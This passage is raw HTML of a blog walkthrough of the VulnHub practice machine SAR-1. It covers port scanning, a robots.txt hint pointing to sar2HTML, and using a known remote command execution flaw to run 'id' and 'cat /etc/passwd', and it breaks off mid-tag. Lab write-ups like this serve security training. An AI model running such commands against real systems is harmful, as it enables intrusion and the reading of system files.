#6fa8dc;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;SAR-1&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh3w_WIkT45G0lr7YI8rhNXIWnzCJCE8heWhrCoMEiOYFXGQerlbCMRPpA_BRdr9f5bZN7bxuo84DGURW4UufAFvqW5J4JUbDuK-sx_lZEbUeUptaws32rL_sPE9N6UaRLEnOC5Rt36_-mDjoRBxVJrEKDxHULsr4a3IS3qxUcPZtrqV1FSeXeGVteqDg=s649&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;220&quot; data-original-width=&quot;649&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh3w_WIkT45G0lr7YI8rhNXIWnzCJCE8heWhrCoMEiOYFXGQerlbCMRPpA_BRdr9f5bZN7bxuo84DGURW4UufAFvqW5J4JUbDuK-sx_lZEbUeUptaws32rL_sPE9N6UaRLEnOC5Rt36_-mDjoRBxVJrEKDxHULsr4a3IS3qxUcPZtrqV1FSeXeGVteqDg=s16000&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;1 - INTRODUCTION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The goal of this exercise is to develop a hacking process for the vulnerable machine SAR-1 from the VulnHub pentesting platform.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- SAR-1 can be downloaded from here:&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/sar-1,425/&quot;&gt;https://www.vulnhub.com/entry/sar-1,425/&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Once downloaded SAR-1 and extracted with VirtualBox:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQGLFJs4f8YHeQ8cuCw6D9EoZDGvrEZ18iSD1BU-Dv9WoR4KM4Pcbq639_s9Ly8UcHLppn3F2PgKamDDuSyyPwWKwUgdcg6FfLDWXeb7ShU1GGfKlkbaCWS2_YeGoFi8KniPW114kovtUP/&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img data-original-height=&quot;550&quot; data-original-width=&quot;634&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQGLFJs4f8YHeQ8cuCw6D9EoZDGvrEZ18iSD1BU-Dv9WoR4KM4Pcbq639_s9Ly8UcHLppn3F2PgKamDDuSyyPwWKwUgdcg6FfLDWXeb7ShU1GGfKlkbaCWS2_YeGoFi8KniPW114kovtUP/s16000/screenshot.2.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;2 - ENUMERATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- IP for SAR-1 is 192.168.1.16:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgne8hNQH2aFEozy5sXLKj9EwDC6IwR3HbmI-9AOVs2n1JDbSNcQTCOwpFcMkajIcZ-mJr7TB7x4SeaVQll30htR4mwxjdxGHrK4D1EAdv64nG0WiQkKIrny5iSQxMOTqKIWxEyvaY-Z-fWSZoezpM09CkMetpWSoSkgKgsH9rx12j5fxUVb092987zVA=s438&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;70&quot; data-original-width=&quot;438&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgne8hNQH2aFEozy5sXLKj9EwDC6IwR3HbmI-9AOVs2n1JDbSNcQTCOwpFcMkajIcZ-mJr7TB7x4SeaVQll30htR4mwxjdxGHrK4D1EAdv64nG0WiQkKIrny5iSQxMOTqKIWxEyvaY-Z-fWSZoezpM09CkMetpWSoSkgKgsH9rx12j5fxUVb092987zVA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhJcp6wQhOpl1km9FbQEoN1vCjmNjxExYJXkESX33adg_bg-A1APjlDf5WLqzaeHJeh-C1HVGk7XjDloLCF4USOTgJ72kCoT5nEIS7ruPHgjKZHxq7R_P0GEPw_PzxC_ndRqwROvMLP8wPldF1IZuA_0l6QuL7rjYpFFJkMFv-AdhJ-qj2L-gfd0og1qg=s826&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;209&quot; data-original-width=&quot;826&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhJcp6wQhOpl1km9FbQEoN1vCjmNjxExYJXkESX33adg_bg-A1APjlDf5WLqzaeHJeh-C1HVGk7XjDloLCF4USOTgJ72kCoT5nEIS7ruPHgjKZHxq7R_P0GEPw_PzxC_ndRqwROvMLP8wPldF1IZuA_0l6QuL7rjYpFFJkMFv-AdhJ-qj2L-gfd0og1qg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning with Nmap we discover that port 80 is open:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKuZtrj_V8Gqpg2yPABAK-vHswu_S66gc2RQyHGt-5Iu3gF4nuhKadiYwUaSeDi0F-5sM0PY7CqdVcsynfRwFFd0sgNckRhzUkuFW8KOQHCSzTwMx8SOFgZeo4bnxkb-kriaHBFlLglsvN/&quot; style=&quot;clear: left; display: inline !important; font-family: arial; font-size: large; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img data-original-height=&quot;494&quot; data-original-width=&quot;733&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKuZtrj_V8Gqpg2yPABAK-vHswu_S66gc2RQyHGt-5Iu3gF4nuhKadiYwUaSeDi0F-5sM0PY7CqdVcsynfRwFFd0sgNckRhzUkuFW8KOQHCSzTwMx8SOFgZeo4bnxkb-kriaHBFlLglsvN/s16000/screenshot.4.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Browsing the web server:&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjNJ5HyagntAfFMeKvoakURjG1BHISuN-JKP5ck79PSx_tcgK2PJ7dFtBQscEmRYzQXW7qP_ANEnL5fWTDix8tjoGDcAZWVlOV3xhcrUreuF67w5pBzL-zS5y4u-bTH7zs0ZFFqyz_fhoM0C9yqxKtLsYm-a1nyNUpfGsq5ioqkcQaW-53NRMhCh-diNA=s795&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;396&quot; data-original-width=&quot;795&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjNJ5HyagntAfFMeKvoakURjG1BHISuN-JKP5ck79PSx_tcgK2PJ7dFtBQscEmRYzQXW7qP_ANEnL5fWTDix8tjoGDcAZWVlOV3xhcrUreuF67w5pBzL-zS5y4u-bTH7zs0ZFFqyz_fhoM0C9yqxKtLsYm-a1nyNUpfGsq5ioqkcQaW-53NRMhCh-diNA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Dirbusting we find &lt;b&gt;robots.txt&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhuFAhafHUw-HhiBqv2XPOEsK93a3Ib3YRHSIqb8N1lLxvniMjC0PGDtUyiBQvMcVhPWXaYe-3YnQbCu8EL0FbffhQaJ8tnIa5IBjQ-A_fSzrHiWyOzeybMVLI-7fUpQzUJz-Sr5IlRwX2LOH_36yj5TvgVS2axPLhTAbpb2ELCXR5UD1bzikfk-zLGpA=s633&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;576&quot; data-original-width=&quot;633&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhuFAhafHUw-HhiBqv2XPOEsK93a3Ib3YRHSIqb8N1lLxvniMjC0PGDtUyiBQvMcVhPWXaYe-3YnQbCu8EL0FbffhQaJ8tnIa5IBjQ-A_fSzrHiWyOzeybMVLI-7fUpQzUJz-Sr5IlRwX2LOH_36yj5TvgVS2axPLhTAbpb2ELCXR5UD1bzikfk-zLGpA=s16000&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;robots.txt&lt;/b&gt; contains hint &lt;b&gt;sar2HTML&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEijvFRUihA8ZsSpJKkZZmAztDIEryhFZ6ex52CT41Wj_ZYhvhYo559rzmXH51iNxCAfsnwHQkfrnkVv2lB1MKf9aUa0Wwh_wqw6RRLKAYParD5F2b2GbrIyJ50PBUWHlXEG0p2yp9SSJUc4wAvdbON-IEc3a6mFk_Tsqtlt2IFQelB6nU8ZoFWmRnvtwQ=s500&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;176&quot; data-original-width=&quot;500&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEijvFRUihA8ZsSpJKkZZmAztDIEryhFZ6ex52CT41Wj_ZYhvhYo559rzmXH51iNxCAfsnwHQkfrnkVv2lB1MKf9aUa0Wwh_wqw6RRLKAYParD5F2b2GbrIyJ50PBUWHlXEG0p2yp9SSJUc4wAvdbON-IEc3a6mFk_Tsqtlt2IFQelB6nU8ZoFWmRnvtwQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Checking web page &lt;b&gt;sar2HTML&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgezYHXTh9MeDiaayasD5CFLK7gFp7vi4nEIaDNWDsFLFjkKozJJYFtYX0DkZDiHTNP65co5JDFz68Y2_l9MjXqEz5TtA0bMM2GOcdYqlLW7HFOINOJrBiKti9leFb2eNr3jJdV6RdDvwcNfOJNzVu9S7_DAItEao9t25QMsFDbLyNBdv7zfpbMH0d9qQ=s599&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;189&quot; data-original-width=&quot;599&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgezYHXTh9MeDiaayasD5CFLK7gFp7vi4nEIaDNWDsFLFjkKozJJYFtYX0DkZDiHTNP65co5JDFz68Y2_l9MjXqEz5TtA0bMM2GOcdYqlLW7HFOINOJrBiKti9leFb2eNr3jJdV6RdDvwcNfOJNzVu9S7_DAItEao9t25QMsFDbLyNBdv7zfpbMH0d9qQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;3 - EXPLOITATION&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;s&lt;/b&gt;&lt;span style=&quot;background-color: white; color: #24292f;&quot;&gt;&lt;b&gt;ar2htm&lt;/b&gt;l is a plotting tool for system statistics (sar data), actually there is a Remote Command Execution exploit for &lt;b&gt;version 3.2.1&lt;/b&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhBUpJ3JnKF7HLq6ej7qslnguFdgKhpaUtiO0Syr1-S8B4CTNGDy_vKIpi8OCkMdxi_kHDFhYNbZtmg7aXRDfCXRwvyY_Vhzls0c4n-cFeDRG3KBX0G9tjW_8954pUDgjfjAsmxsyZUb4qgz1kwdrfcfKUTw-wUmCtGx5-HfYhLisVnGlasS_3OZwVQhw=s893&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;304&quot; data-original-width=&quot;893&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhBUpJ3JnKF7HLq6ej7qslnguFdgKhpaUtiO0Syr1-S8B4CTNGDy_vKIpi8OCkMdxi_kHDFhYNbZtmg7aXRDfCXRwvyY_Vhzls0c4n-cFeDRG3KBX0G9tjW_8954pUDgjfjAsmxsyZUb4qgz1kwdrfcfKUTw-wUmCtGx5-HfYhLisVnGlasS_3OZwVQhw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;clear: left; float: left; font-family: arial; font-size: medium; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;323&quot; data-original-width=&quot;652&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhXPaDr7CGmFE4iPFBGH0b-rueLDwpsicDN5rzyFmlSMtKuHG1lcCUBAhA752wD0ejwbnpT_nKG-CsV7NIGtfVanoMlA47k3Ca8FzUjyRFmvUBqCl9YDl8dcqt_OTq_dGnbflKTnImTQVuUQexd-kvEnQQllmA40QSxUSV6LckhUMXwyMtTMs9how3R9w=s16000&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Using the exploit we can execute some commands, for instance &quot;id&quot; and &quot;cat /etc/passwd&quot;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj8HGh0qF-ryGxsUx4ors-HWx4LsPxmbvRc0jYU4p4e21-E0u2fCBnPGugAvoiCSg8gpVOSLtdf7JfnNKg_rvaVbfOA_J2ASlnHKqDGgn4O2raq9xqQ762IyaDhJNXqu2JL4BThbAfxcif58OF-11yziKYSFuG4CtSlsKBFKB0FEr4BghhipgE1lYUMtA=s607&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;329&quot; data-original-width=&quot;607&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj8HGh0qF-ryGxsUx4ors-HWx4LsPxmbvRc0jYU4p4e21-E0u2fCBnPGugAvoiCSg8gpVOSLtdf7JfnNKg_rvaVbfOA_J2ASlnHKqDGgn4O2raq9xqQ762IyaDhJNXqu2JL4BThbAfxcif58OF-11yziKYSFuG4CtSlsKBFKB0FEr4BghhipgE1lYUMtA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiNk-ZFCkB2C85xUI-uRF3MLaVqpeqYzUofy9pbWNDZQDBlWFthxIDkzHsKrnS5GCNELhno3WmAGRpy0k1AQZL_QduvpH9vXTSG4d5l2oLThWPH0TaygiboMihrlseOi6v_vrjHBEE35U4TSWEGSLnE-lRhQcTzDjv4Ms_9H6KfhBMb0FRVF_Ki5RQ8Bw=s822&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/a&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiNk-ZFCkB2C85xUI-uRF3MLaVqpeqYzUofy9pbWNDZQDBlWFthxIDkzHsKrnS5GCNELhno3WmAGRpy0k1AQZL_QduvpH9vXTSG4d5l2oLThWPH0TaygiboMihrlseOi6v_vrjHBEE35U4TSWEGSLnE-lRhQcTzDjv4Ms_9H6KfhBMb0FRVF_Ki5RQ8Bw=s822&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/a&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiNk-ZFCkB2C85xUI-uRF3MLaVqpeqYzUofy9pbWNDZQDBlWFthxIDkzHsKrnS5GCNELhno3WmAGRpy0k1AQZL_QduvpH9vXTSG4d5l2oLThWPH0TaygiboMihrlseOi6v_vrjHBEE35U4TSWEGSLnE-lRhQcTzDjv4Ms_9H6KfhBMb0FRVF_Ki5RQ8Bw=s822&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/a&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiNk-ZFCkB2C85xUI-uRF3MLaVqpeqYzUofy9pbWNDZQDBlWFthxIDkzHsKrnS5GCNELhno3WmAGRpy0k1AQZL_QduvpH9vXTSG4d5l2oLThWPH0TaygiboMihrlseOi6v_vrjHBEE35U4TSWEGSLnE-lRhQcTzDjv4Ms_9H6KfhBMb0FRVF_Ki5RQ8Bw=s822&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;822&quot; data-original-width=&quot;668&quot; 